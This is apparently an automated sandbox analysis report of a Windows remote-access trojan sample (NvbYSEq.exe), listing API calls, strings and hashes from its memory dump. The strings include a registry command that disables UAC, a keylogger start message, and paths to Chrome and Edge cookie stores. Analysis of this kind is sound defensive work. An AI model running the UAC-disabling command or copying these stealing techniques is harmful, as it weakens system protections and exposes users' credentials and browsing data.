                                      • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CreateProcess
                                      • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                      • API String ID: 2922976086-4183131282
                                      • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                      • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                      • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                      • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: SG$C:\Users\user\AppData\Roaming\NvbYSEq.exe
                                      • API String ID: 0-3615582252
                                      • Opcode ID: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                                      • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                      • Opcode Fuzzy Hash: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                                      • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                      • SetEvent.KERNEL32(?), ref: 0040512C
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                      • CloseHandle.KERNEL32(?), ref: 00405140
                                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                      • String ID: KeepAlive | Disabled
                                      • API String ID: 2993684571-305739064
                                      • Opcode ID: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                                      • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                      • Opcode Fuzzy Hash: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                                      • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                      • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                      • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                      • Sleep.KERNEL32(00002710), ref: 0041AE07
                                      • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: PlaySound$HandleLocalModuleSleepTime
                                      • String ID: Alarm triggered
                                      • API String ID: 614609389-2816303416
                                      • Opcode ID: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
                                      • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                      • Opcode Fuzzy Hash: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
                                      • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      APIs
                                      • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                      • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                                      • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                                      • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                                      Strings
                                      • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Console$AttributeText$BufferHandleInfoScreen
                                      • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                      • API String ID: 3024135584-2418719853
                                      • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                      • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                      • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                      • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                      • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                      • Opcode Fuzzy Hash: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                      • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                      • _free.LIBCMT ref: 00444E06
                                      • _free.LIBCMT ref: 00444E1D
                                      • _free.LIBCMT ref: 00444E3C
                                      • _free.LIBCMT ref: 00444E57
                                      • _free.LIBCMT ref: 00444E6E
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$AllocateHeap
                                      • String ID:
                                      • API String ID: 3033488037-0
                                      • Opcode ID: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
                                      • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                      • Opcode Fuzzy Hash: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
                                      • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      APIs
                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                      • _free.LIBCMT ref: 004493BD
                                        • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                        • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                      • _free.LIBCMT ref: 00449589
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                      • String ID:
                                      • API String ID: 1286116820-0
                                      • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                      • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                      • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                      • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                      • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                        • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                        • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                        • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 4269425633-0
                                      • Opcode ID: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                                      • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                      • Opcode Fuzzy Hash: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                                      • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                      • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                      • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                      • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                        • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                      • _free.LIBCMT ref: 0044F3BF
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                                      • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                      • Opcode Fuzzy Hash: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                                      • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      APIs
                                      • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C44D
                                      • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C459
                                      • WriteFile.KERNEL32(00000000,00000000,00000000,00406F85,00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C46A
                                      • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C477
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreatePointerWrite
                                      • String ID:
                                      • API String ID: 1852769593-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetLastError.KERNEL32(?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044829E
                                      • _free.LIBCMT ref: 004482D3
                                      • _free.LIBCMT ref: 004482FA
                                      • SetLastError.KERNEL32(00000000), ref: 00448307
                                      • SetLastError.KERNEL32(00000000), ref: 00448310
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _free.LIBCMT ref: 004509D4
                                        • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                        • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                      • _free.LIBCMT ref: 004509E6
                                      • _free.LIBCMT ref: 004509F8
                                      • _free.LIBCMT ref: 00450A0A
                                      • _free.LIBCMT ref: 00450A1C
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _free.LIBCMT ref: 00444066
                                        • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                        • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                      • _free.LIBCMT ref: 00444078
                                      • _free.LIBCMT ref: 0044408B
                                      • _free.LIBCMT ref: 0044409C
                                      • _free.LIBCMT ref: 004440AD
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: PkGNG
                                      • API String ID: 0-263838557
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _strpbrk.LIBCMT ref: 0044E738
                                      • _free.LIBCMT ref: 0044E855
                                        • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,?,?,?,?,?,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                                        • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD3D
                                        • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000), ref: 0043BD44
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                      • String ID: *?$.
                                      • API String ID: 2812119850-3972193922
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountEventTick
                                      • String ID: !D@$NG
                                      • API String ID: 180926312-2721294649
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                        • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                        • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFileKeyboardLayoutNameconnectsend
                                      • String ID: XQG$NG$PG
                                      • API String ID: 1634807452-3565412412
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: `#D$`#D
                                      • API String ID: 885266447-2450397995
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B900
                                      • GetLastError.KERNEL32 ref: 0044B931
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                      • String ID: PkGNG
                                      • API String ID: 2456169464-263838557
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                        • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                        • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                        • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                        • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                      • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                      • String ID: /sort "Visit Time" /stext "$0NG
                                      • API String ID: 368326130-3219657780
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _wcslen.LIBCMT ref: 004162F5
                                        • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                        • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                        • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                        • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _wcslen$CloseCreateValue
                                      • String ID: !D@$okmode$PG
                                      • API String ID: 3411444782-3370592832
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                      • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                      Strings
                                      • User Data\Default\Network\Cookies, xrefs: 0040C603
                                      • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                      • API String ID: 1174141254-1980882731
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                      • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                      Strings
                                      • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                      • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                      • API String ID: 1174141254-1980882731
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateThread.KERNEL32(00000000,00000000,0040A27D,004750F0,00000000,00000000), ref: 0040A1FE
                                      • CreateThread.KERNEL32(00000000,00000000,0040A267,004750F0,00000000,00000000), ref: 0040A20E
                                      • CreateThread.KERNEL32(00000000,00000000,0040A289,004750F0,00000000,00000000), ref: 0040A21A
                                        • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                        • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread$LocalTimewsprintf
                                      • String ID: Offline Keylogger Started
                                      • API String ID: 465354869-4114347211
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                        • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                      • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040AF6E
                                      • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040AF7A
